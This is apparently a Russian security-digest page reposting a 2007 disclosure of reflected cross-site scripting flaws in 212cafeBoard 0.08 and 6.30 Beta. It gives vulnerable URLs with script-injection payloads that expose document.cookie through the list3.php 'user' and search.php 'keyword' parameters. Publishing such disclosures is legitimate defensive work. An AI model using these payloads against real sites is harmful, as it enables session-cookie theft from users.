Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

webchat File Include Vulnerability

From:	xx_hack_xx_2004_(at)_hotmail.com <xx_hack_xx_2004_(at)_hotmail.com>
Date:	22 января 2007 г.
Subject:	XSS in 212cafeBoard ( Verision 0.08 & 6.30 Beta )

Hello

Vulnerable : 212cafeBoard
Version: 0.08 Beta
        6.30 Beta
Web : http://www.212cafe.com


i found XSS 212cafeBoard v6.30 Beta :


http://www.example.com/Board/list3.php?user=[XSS]

For Example , you can put :
http://www.example.com/board/list3.php?user='><script>alert(docu
ment.cookie);</script>

-----------------
and i found XSS in 212cafeBoard v0.08 beta


http://www.example.com/board/search.php?keyword=[XSS]

For Example :
http://www.example.com/board/search.php?keyword='><script>alert(
document.cookie);</script>


-------------------
Discoverey By Linux_Drox
www.LeZr.Com/vb

Best Regards ,,,,